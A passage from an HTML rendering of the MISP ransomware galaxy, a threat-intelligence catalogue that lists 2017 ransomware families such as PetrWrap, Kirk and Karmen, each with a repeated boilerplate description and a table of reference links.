Ransomware is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/ransomware.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p><a href="https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml" class="bare">https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml</a> - <a href="http://pastebin.com/raw/GHgpWjar" class="bare">http://pastebin.com/raw/GHgpWjar</a></p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_nhtnwcuf_ransomware_fake"><a class="anchor" href="#_nhtnwcuf_ransomware_fake"></a><a class="link" href="#_nhtnwcuf_ransomware_fake">Nhtnwcuf Ransomware (Fake)</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1678. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/nhtnwcuf-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/nhtnwcuf-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptojacky_ransomware"><a class="anchor" href="#_cryptojacky_ransomware"></a><a class="link" href="#_cryptojacky_ransomware">CryptoJacky Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1679. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/cryptojacky-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/cryptojacky-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/jiriatvirlab/status/838779371750031360">https://twitter.com/jiriatvirlab/status/838779371750031360</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kaenlupuf_ransomware"><a class="anchor" href="#_kaenlupuf_ransomware"></a><a class="link" href="#_kaenlupuf_ransomware">Kaenlupuf Ransomware</a></h3>
<div class="paragraph">
<p>About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1680. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/kaenlupuf-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/kaenlupuf-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_enjeycrypter_ransomware"><a class="anchor" href="#_enjeycrypter_ransomware"></a><a class="link" href="#_enjeycrypter_ransomware">EnjeyCrypter Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1681. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/enjey-crypter-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/enjey-crypter-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-10th-2017-spora-cerber-and-technical-writeups/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-10th-2017-spora-cerber-and-technical-writeups/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/embittered-enjey-ransomware-developer-launches-ddos-attack-on-id-ransomware/">https://www.bleepingcomputer.com/news/security/embittered-enjey-ransomware-developer-launches-ddos-attack-on-id-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dangerous_ransomware"><a class="anchor" href="#_dangerous_ransomware"></a><a class="link" href="#_dangerous_ransomware">Dangerous Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1682. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/dangerous-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/dangerous-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vortex_ransomware"><a class="anchor" href="#_vortex_ransomware"></a><a class="link" href="#_vortex_ransomware">Vortex Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Vortex Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ŧl๏tєгค гคภร๏๓ฬคгє</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1683. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/vortex-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/vortex-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/839778905091424260">https://twitter.com/struppigel/status/839778905091424260</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gc47_ransomware"><a class="anchor" href="#_gc47_ransomware"></a><a class="link" href="#_gc47_ransomware">GC47 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1684. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/gc47-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/gc47-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rozalocker_ransomware"><a class="anchor" href="#_rozalocker_ransomware"></a><a class="link" href="#_rozalocker_ransomware">RozaLocker Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1685. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/rozalocker-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/rozalocker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/jiriatvirlab/status/840863070733885440">https://twitter.com/jiriatvirlab/status/840863070733885440</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptomeister_ransomware"><a class="anchor" href="#_cryptomeister_ransomware"></a><a class="link" href="#_cryptomeister_ransomware">CryptoMeister Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1686. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/cryptomeister-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/cryptomeister-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gg_ransomware"><a class="anchor" href="#_gg_ransomware"></a><a class="link" href="#_gg_ransomware">GG Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Poses as Hewlett-Packard 2016</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1687. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/gg-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/gg-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_project34_ransomware"><a class="anchor" href="#_project34_ransomware"></a><a class="link" href="#_project34_ransomware">Project34 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1688. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/project34-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/project34-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_petrwrap_ransomware"><a class="anchor" href="#_petrwrap_ransomware"></a><a class="link" href="#_petrwrap_ransomware">PetrWrap Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1689. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/petrwrap-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/petrwrap-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/petrwrap-ransomware-is-a-petya-offspring-used-in-targeted-attacks/">https://www.bleepingcomputer.com/news/security/petrwrap-ransomware-is-a-petya-offspring-used-in-targeted-attacks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/">https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_karmen_ransomware"><a class="anchor" href="#_karmen_ransomware"></a><a class="link" href="#_karmen_ransomware">Karmen Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. RaaS, baed on HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1690. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/karmen-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/karmen-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/841747002438361089">https://twitter.com/malwrhunterteam/status/841747002438361089</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_revenge_ransomware"><a class="anchor" href="#_revenge_ransomware"></a><a class="link" href="#_revenge_ransomware">Revenge Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoMix / CryptFile2 Variant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1691. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/">https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/revenge-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/revenge-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_turkish_fileencryptor_ransomware"><a class="anchor" href="#_turkish_fileencryptor_ransomware"></a><a class="link" href="#_turkish_fileencryptor_ransomware">Turkish FileEncryptor Ransomware</a></h3>
<div class="paragraph">
<p>his is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Turkish FileEncryptor Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Fake CTB-Locker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1692. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/turkish-fileencryptor.html">https://id-ransomware.blogspot.co.il/2017/03/turkish-fileencryptor.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/842034887397908480">https://twitter.com/JakubKroustek/status/842034887397908480</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kirk_ransomware_spock_decryptor"><a class="anchor" href="#_kirk_ransomware_spock_decryptor"></a><a class="link" href="#_kirk_ransomware_spock_decryptor">Kirk Ransomware &amp; Spock Decryptor</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Payments in Monero</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1693. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/kirkspock-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/kirkspock-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/642239/kirk-ransomware-help-support-topic-kirk-extension-ransom-notetxt/">https://www.bleepingcomputer.com/forums/t/642239/kirk-ransomware-help-support-topic-kirk-extension-ransom-notetxt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.networkworld.com/article/3182415/security/star-trek-themed-kirk-ransomware-has-spock-decryptor-demands-ransom-be-paid-in-monero.html">http://www.networkworld.com/article/3182415/security/star-trek-themed-kirk-ransomware-has-spock-decryptor-demands-ransom-be-paid-in-monero.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.securityweek.com/star-trek-themed-kirk-ransomware-emerges">http://www.securityweek.com/star-trek-themed-kirk-ransomware-emerges</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.grahamcluley.com/kirk-ransomware-sports-star-trek-themed-decryptor-little-known-crypto-currency/">https://www.grahamcluley.com/kirk-ransomware-sports-star-trek-themed-decryptor-little-known-crypto-currency/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virustotal.com/en/file/39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc/analysis/">https://www.virustotal.com/en/file/39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc/analysis/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zinocrypt_ransomware"><a class="anchor" href="#_zinocrypt_ransomware"></a><a class="link" href="#_zinocrypt_ransomware">ZinoCrypt Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1694. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/zinocrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/zinocrypt-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335?lang=en">https://twitter.com/demonslay335?lang=en</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/842781575410597894">https://twitter.com/malwrhunterteam/status/842781575410597894</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crptxxx_ransomware"><a class="anchor" href="#_crptxxx_ransomware"></a><a class="link" href="#_crptxxx_ransomware">Crptxxx Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Uses @enigma0x3&#8217;s UAC bypass</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1695. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/crptxxx-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/crptxxx-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/609690/ultracrypter-cryptxxx-ultradecrypter-ransomware-help-topic-crypt-cryp1/page-84">https://www.bleepingcomputer.com/forums/t/609690/ultracrypter-cryptxxx-ultradecrypter-ransomware-help-topic-crypt-cryp1/page-84</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.fixinfectedpc.com/uninstall-crptxxx-ransomware-from-pc">http://www.fixinfectedpc.com/uninstall-crptxxx-ransomware-from-pc</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/839467168760725508">https://twitter.com/malwrhunterteam/status/839467168760725508</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_motd_ransomware"><a class="anchor" href="#_motd_ransomware"></a><a class="link" href="#_motd_ransomware">MOTD Ransomware</a></h3>
<div class="paragraph">
<p>About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1696. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/motd-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/motd-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/642409/motd-of-ransome-hostage/">https://www.bleepingcomputer.com/forums/t/642409/motd-of-ransome-hostage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/642409/motd-ransomware-help-support-topics-motdtxt-and-enc-extension/">https://www.bleepingcomputer.com/forums/t/642409/motd-ransomware-help-support-topics-motdtxt-and-enc-extension/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptodevil_ransomware"><a class="anchor" href="#_cryptodevil_ransomware"></a><a class="link" href="#_cryptodevil_ransomware">CryptoDevil Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1697. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/cryptodevil-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/cryptodevil-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/843527738774507522">https://twitter.com/PolarToffee/status/843527738774507522</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fabsyscrypto_ransomware"><a class="anchor" href="#_fabsyscrypto_ransomware"></a><a class="link" href="#_fabsyscrypto_ransomware">FabSysCrypto Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1698. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/fabsyscrypto-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/fabsyscrypto-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/837565766073475072">https://twitter.com/struppigel/status/837565766073475072</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lock2017_ransomware"><a class="anchor" href="#_lock2017_ransomware"></a><a class="link" href="#_lock2017_ransomware">Lock2017 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1699. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/lock2017-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/lock2017-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_redants_ransomware"><a class="anchor" href="#_redants_ransomware"></a><a class="link" href="#_redants_ransomware">RedAnts Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1700. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2017/03/redants-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/redants-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
